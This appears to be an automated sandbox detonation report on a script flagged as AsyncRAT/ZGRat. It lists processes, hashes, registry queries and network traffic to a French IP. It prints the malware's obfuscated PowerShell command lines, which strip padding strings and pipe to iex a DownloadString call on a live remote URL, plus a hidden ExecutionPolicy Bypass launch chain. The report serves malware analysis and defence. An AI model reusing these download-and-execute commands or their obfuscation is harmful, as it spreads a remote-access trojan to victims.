ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yaaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ydaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ySaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§
ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yraUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y','')|iex
C:\Windows\system32\taskeng.exe
taskeng.exe {A605EA56-7FCE-4A22-BA4B-B804128017D9} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\Users\Public\hich.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
Network
| Country | Destination | Domain | Proto |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
| FR | 185.81.157.103:80 | 185.81.157.103 | tcp |
Files
memory/2284-7-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/2284-8-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/2284-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2284-12-0x0000000002C70000-0x0000000002CF0000-memory.dmp
memory/2284-11-0x0000000002C70000-0x0000000002CF0000-memory.dmp
memory/2284-10-0x0000000002C70000-0x0000000002CF0000-memory.dmp
memory/2284-13-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2284-17-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
C:\Users\Public\hich.vbs
| MD5 | 741b5b0a474f0e0cd28fd880f68723c0 |
| SHA1 | 4de5489c4e56882514b3ab432048200eae65f90d |
| SHA256 | f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23 |
| SHA512 | 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54 |
C:\Users\Public\hich.bat
| MD5 | 6c8a34a94e068b809145df09acbe153c |
| SHA1 | 0ec5c6964c6ccc949af47297eb9794f8f1ee4724 |
| SHA256 | c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003 |
| SHA512 | 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 615a7b1b6cd63e8be3b318138ff66688 |
| SHA1 | f0fb5b11ff93a7448a158b2345737fd336c6893d |
| SHA256 | b04be3f8c76d1e49c8f94d01bf8567c5b35295031c9edf676989d0b489d09a1c |
| SHA512 | 19d30cb7e4c6d1412ca22383fd3de296eff42a17118bf9a05e9acac5cb974bf7f7a709437cb6a7b62679f95710519d30af850729f60f829aebde6bad8cc439d0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9G1B1EYCVQY3966BXDZH.temp
| MD5 | e32cad1ab4c8a3ad44873e572ee4dc01 |
| SHA1 | d0bf141a980383e56b523ccf0203ae37151ab10f |
| SHA256 | ed659d481dde23fd44f7a4a9c3c44cc27151e472f56652ab6053a3cf0c48b8d6 |
| SHA512 | aa0cff138df661064838132e286180d365d4f5f58c46879efddffada1cf7d4322f3d1d4e0622d4b873b02713d06a85bb26a1c8b1673595435e2f68366523e48c |
memory/2184-25-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/2184-27-0x0000000002DB0000-0x0000000002E30000-memory.dmp
memory/2184-28-0x00000000022A0000-0x00000000022A8000-memory.dmp
memory/2184-31-0x0000000002DB0000-0x0000000002E30000-memory.dmp
memory/2184-30-0x0000000002DB0000-0x0000000002E30000-memory.dmp
memory/2184-29-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
memory/2184-26-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
C:\Users\Public\hich.ps1
| MD5 | 7cc8cf044a1603d177667066b558742b |
| SHA1 | 822b16d67f89023109a2fb8a091c7949f7fb3bc4 |
| SHA256 | 3afa667e8bb93d5f1336e4e4ffdaa5c31508b3ff4d06309931f0a95121636d19 |
| SHA512 | 28bd26a588b874196e79b1e993ec9116fe0c3777c91630b5154fa745b378719726805162fcab9bac2b76cea30f20bc119d51eed9d4e95bd72cae68283b6ad175 |
memory/2184-32-0x0000000002DB0000-0x0000000002E30000-memory.dmp
memory/2184-34-0x0000000002AA0000-0x0000000002AD4000-memory.dmp
memory/2184-35-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
memory/2184-36-0x0000000002DB0000-0x0000000002E30000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-25 11:33
Reported
2024-01-25 11:36
Platform
win10v2004-20231222-en
Max time kernel
144s
Max time network
149s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4800 set thread context of 3484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y(aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yGaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yM 
*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y-aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yOaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y)NaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï
¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y.aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ye